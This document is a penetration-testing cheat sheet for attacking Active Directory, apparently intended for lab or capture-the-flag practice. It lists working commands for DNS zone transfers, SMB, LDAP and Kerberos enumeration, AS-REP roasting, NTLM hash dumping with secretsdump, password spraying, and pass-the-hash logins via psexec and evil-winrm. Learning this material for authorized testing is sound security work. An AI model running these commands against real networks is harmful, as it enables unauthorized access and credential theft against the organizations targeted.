Active Directory Attacking Methodology
======================================================================
======================================================================
Website for help: https://wadcoms.github.io/
Detailed Information: https://navkang.github.io/Doozy/winprivesc2.html
-------------------------------------------------------------------------------------
Port 53 open: (zone transfer)
dig axfr @10.10.10.10 local.htb
dig axfr @10.10.10.10 local-bank.local
-------------------------------------------------------------------------------------
Ports 135, 139 and 445 open: (shares, computer and domain info, users)
smbclient -L \\\\<ip>\\
smbclient \\\\<ip>\\<sharename>
smbclient -U <username> \\\\<ip>\\<sharename>
-----------------------------------------------------------
smbmap -H <ip>
smbmap -u user -p pass -H <ipadd>
(also try with "" instead of user and pass)
-----------------------------------------------------------
rpcclient -U "" IPadd
- enumdomusers
- enumdomgroups
- queryuser <RID>
----------------------------------------------------------
crackmapexec smb <ipadd> -u '' -p ''   (null session)
-------------------------------------------------------------------------------------
Port 389 open: (domain and users information)
LDAPsearch:
-x = simple (here anonymous) bind, -b = base DN to search, -H = LDAP URI of the host
ldapsearch -x -H ldap://10.10.10.175 -s base namingcontexts (returns the naming contexts; use the domain DN in the next command)
ldapsearch -x -H ldap://10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL'
-------------------------------------------------------------------------------------
Kerberos port 88 open: (enumerating valid usernames)
kerbrute userenum -d test.local <username list> --dc <ip add>
kerbrute userenum -d test.local <username list>
-------------------------------------------------------------------------------------
Other tools & purpose:
GetNPUsers.py (look for vulnerable users - needs a valid username list)
python3 GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt
-----------------------------------------------------------
Secretsdump.py (dump hashes)
secretsdump.py -just-dc-ntlm <domain/username>@<ipadd>
----------------------------------------------------------
password spraying:
crackmapexec smb <ipadd> -u user.list -p password --continue-on-success
---------------------------------------------------------------------------------------------------------------------
Connecting tools:
PSEXEC:
impacket-psexec username:password@ipadd
impacket-psexec administrator@ipadd -hashes :<NT hash>   (LM:NT format; LM part left empty, NT hash is the second half of the dumped hash)
------------------------------------------------------------
EVIL-WINRM:
evil-winrm -i <ip add> -u user -p pass
-----------------------------------------------------------
CRACKMAPEXEC:
crackmapexec smb 10.129.79.75 -u user -p pass
(other protocol modules exist, e.g. winrm can be used in place of smb)